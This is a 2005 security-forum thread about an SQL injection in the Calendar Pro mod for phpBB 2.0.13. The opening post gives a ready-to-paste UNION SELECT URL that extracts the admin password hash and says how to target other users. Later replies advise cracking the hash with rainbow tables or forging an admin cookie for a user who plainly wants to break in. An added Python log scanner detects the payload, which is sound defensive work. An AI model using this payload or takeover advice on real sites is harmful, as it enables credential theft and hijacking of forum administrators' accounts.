IT Security and Insecurity Portal

Another one! Phpbb 2.0.13 + Calendar Mod

Posted: Tue Apr 05, 2005 10:11 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Another SQL injection discovered in another mod for phpbb 2.0.13, published at milw0rm's page and found by Cerebrums again.
Now it seems to be in the "Calendar Pro" mod (NOTE: Not the "Topic Calendar" mod!).
Here's the exploit:
http://www.milw0rm.com/id.php?id=910
But, once again, I prefer to simply paste the injection url in the browser:
Code:
http://[target]/[phpbb_folder]/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/*
This one gives the admin password hash, simply change the "user_id=" number to get the hash of another user.
I made a screenshot to show where the hash appears in the page if the exploit worked: Screenshot
Salut!
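
A defender-side check for the request pattern in the post above, as an added example that is not part of the original thread: it scans web-server access-log lines for requests to cal_view_month.php whose month, year or category value is not a plain integer. The Common Log Format, the /forum/ path, the sample lines and the assumption that legitimate values of these three parameters are integers are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters of cal_view_month.php seen in the URL quoted in the post above.
# Assumption: legitimate values are plain (possibly negative) integers.
NUMERIC_PARAMS = ("month", "year", "category")
INT_RE = re.compile(r"-?\d+")  # used with fullmatch, so the whole value must match
# Request field of a Common Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return names of numeric parameters whose decoded value is not an integer."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cal_view_month.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes the values
    return [name for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if not INT_RE.fullmatch(value)]

def scan(log_lines):
    """Yield (client_ip, bad_params) for each log line worth reviewing."""
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_params(match.group(1))
        if bad:
            yield line.split(" ", 1)[0], bad

# Constructed sample log lines (documentation IP ranges, hypothetical /forum/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2005:09:12:01 +0000] "GET /forum/cal_view_month.php?month=04&year=2005&category=3 HTTP/1.1" 200 8123',
    '198.51.100.7 - - [06/Apr/2005:09:14:37 +0000] "GET /forum/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/* HTTP/1.1" 200 8340',
    '192.0.2.10 - - [06/Apr/2005:09:15:02 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 15002',
]

if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(f"{ip}: non-numeric value in {', '.join(params)}")
```

The same integer-only rule, applied inside the script before the value reaches the SQL query, is what removes the injection; the log scan only shows who has already tried it.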

Re: Another one! Phpbb 2.0.13 + Calendar Mod

Posted: Wed Apr 06, 2005 3:08 am
xtremeshell
Regular user
Joined: Mar 21, 2005
Posts: 6
Location: Somewhere In Hell !!

"This one gives the admin password hash, simply change the "user_id=" number to get the hash of another user. "
=================================================
After I have the admin hash, How do I crack it ?? ( Sorry for my stupid questions ) Should I use some software ?? such as JTR ?? Or Simply, how to exploit the admin panel with that admin hash ???
thX

Posted: Wed Apr 06, 2005 7:25 am
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!).

Posted: Wed Apr 06, 2005 8:11 am
xtremeshell
Regular user
Joined: Mar 21, 2005
Posts: 6
Location: Somewhere In Hell !!

murdock wrote: | You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!). |
Mm.... Rainbow Tables ?? I'll find it.... And maybe I'll prefer to use the hash as a cookie maybe ?? hehehhehehehe.... Well, let's go !!
Thx for the rept

Posted: Wed Apr 06, 2005 11:45 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Why can't people just put their time into phpBB itself. There's not many sites that I've seen that use the calendar and download mods. Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims.

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Wed Apr 06, 2005 12:58 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

shai-tan wrote: | ...
Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims. |
Yeah, sure, that webmasters and admins are not pleased with new defacement waves
Anyway - phpbb is already very researched piece of software and new security holes are more and more hard to find

Posted: Wed Apr 06, 2005 1:15 pm
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Yes well we are just going to have to wait till 3.0 comes out ....I remember all the posts long ago about how secure 2.0.0 was going to be...... now look at it.....

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Wed Apr 06, 2005 2:28 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yep, all the new, rewritten from scratch versions are good target for security audit, that's true

Posted: Wed Apr 06, 2005 3:03 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

waraxe wrote: |
Anyway - phpbb is already very researched piece of software and new security holes are more and more hard to find |
yes, I've seen so many security holes being found at PHPbb, but now i think it more n more secure, because there are so many fix since it was born, lol
so, now the attacking will against the module in the phorum
like PHPnuke i think

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Fri Apr 08, 2005 12:25 pm
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Yes phpNuke I think is in for an exploit spell. It's too big. Small and simple things are always the most secure

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Fri Apr 08, 2005 3:02 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

shai-tan wrote: | Yes phpNuke I think is in for an exploit spell. It's too big. Small and simple things are always the most secure |
Phpnuke is really amazing piece of software - very big and strong community, very ineffective and insecure coding (kinda bloatware). It contains many-many legacy code fragments, absolutely not used nowadays. And what's more bad - all those add-ons and stuff - most of them are examples of insecure coding. There are good derivations of the phpnuke - like cpgnuke and stuff, but i think, it's time to rewrite phpnuke from scratch - why not as version 8.0
By the way - i use phpnuke myself (as you all can see) and its my own derivation, so called "waraxe edition". I was optimizing nuke core engine and all the modules and performance was growing 200%-300%.
Just look at page generation times and compare it to other, classical nuke sites

Posted: Fri Apr 08, 2005 3:19 pm
wyk
Regular user
Joined: Mar 15, 2005
Posts: 10

waraxe, are you ready to share this derivation with others?

Posted: Fri Apr 08, 2005 3:35 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

wyk wrote: | waraxe, are you ready to share this derivation with others? |
It's on early stage. Still i have not finished modules "downloads", "weblinks" and "votes". And there is more stuff to finish. Maybe i will release it near future, let's see.
But one thing is sure - my nuke derivation is meant to be as secure as possible (for nuke). Right now there is implemented countermeasures against path disclosure, some obstacles against sql injections and all the suspicious activity and all the internal errors will be logged. And so far - from January 2005 - it has not fallen apart yet
So seems that waraxe edition alpha release is coming out before summer 2005

Posted: Fri Apr 08, 2005 4:40 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

i just think about that sometimes coz we all know phpnuke has a big community, why don't phpnuke make a restriction of module, or maybe all the include module should have some 'security test' and permit from them
waraxe: about your own modification, i think it would be great if u can share it.. n better if u post one to "php nuke" developer so they could learn it.. can't wait for it

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sat Apr 09, 2005 4:53 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Yes it will be very popular. I want a beta now to be honest.
Why not call it Php-Waraxe-Nuke or just Waraxe-Nuke. Then we can tell Php-Nuke.org to shove 8.0 up their A*s

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

All times are GMT